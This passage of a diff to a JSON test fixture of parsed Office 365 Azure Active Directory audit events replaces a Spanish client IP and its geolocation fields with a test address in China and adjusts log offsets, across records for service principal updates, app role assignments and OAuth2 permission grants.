         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:45:37",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -12999,20 +12839,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -13023,8 +12861,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:45:37.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Update service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -13039,7 +12877,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 403386,
+        "log.offset": 403224,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -13068,9 +12906,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:45:37",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -13155,20 +12993,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -13179,8 +13015,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:45:41.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add app role assignment to service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -13195,7 +13031,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 407299,
+        "log.offset": 407135,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -13224,9 +13060,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:45:41",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -13318,20 +13154,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -13342,8 +13176,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:45:41.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add app role assignment to service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -13358,7 +13192,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 412451,
+        "log.offset": 412285,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -13387,9 +13221,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:45:41",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -13481,20 +13315,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -13505,8 +13337,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:45:41.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add app role assignment to service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -13521,7 +13353,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 417603,
+        "log.offset": 417435,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -13550,9 +13382,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:45:41",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -13644,20 +13476,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -13668,8 +13498,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:45:41.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add app role assignment to service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -13684,7 +13514,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 422755,
+        "log.offset": 422585,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -13713,9 +13543,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:45:41",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -13807,20 +13637,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -13831,8 +13659,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:45:41.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add app role assignment to service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -13847,7 +13675,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 427907,
+        "log.offset": 427735,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -13876,9 +13704,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:45:41",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -13970,20 +13798,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -13994,8 +13820,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:45:41.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add app role assignment to service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -14010,7 +13836,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 433059,
+        "log.offset": 432885,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -14039,9 +13865,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:45:41",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -14133,20 +13959,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -14157,8 +13981,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:45:41.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add app role assignment to service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -14173,7 +13997,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 438211,
+        "log.offset": 438035,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -14202,9 +14026,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:45:41",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -14296,20 +14120,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -14320,8 +14142,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:45:41.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add app role assignment to service principal.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -14336,7 +14158,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 443363,
+        "log.offset": 443185,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -14365,9 +14187,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:45:41",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -14459,20 +14281,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -14483,8 +14303,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:45:42.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add OAuth2PermissionGrant.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -14499,7 +14319,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 448515,
+        "log.offset": 448335,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -14528,9 +14348,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:45:42",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -14622,20 +14442,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -14646,8 +14464,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:45:42.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add OAuth2PermissionGrant.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -14662,7 +14480,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 453904,
+        "log.offset": 453722,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -14691,9 +14509,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:45:42",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -14785,20 +14603,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "83.57.233.151",
+        "related.ip": "175.16.199.1",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "83.57.233.151",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -14809,8 +14625,8 @@
     },
     {
         "@timestamp": "2020-02-11T16:45:42.000Z",
-        "client.address": "83.57.233.151",
-        "client.ip": "83.57.233.151",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "Add OAuth2PermissionGrant.",
         "event.category": "web",
         "event.code": "AzureActiveDirectory",
@@ -14825,7 +14641,7 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 459293,
+        "log.offset": 459109,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -14854,9 +14670,9 @@
             }
         ],
         "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "o365.audit.ActorIpAddress": "83.57.233.151",
+        "o365.audit.ActorIpAddress": "175.16.199.1",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "83.57.233.151",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CreationTime": "2020-02-11T16:45:42",
         "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
         "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
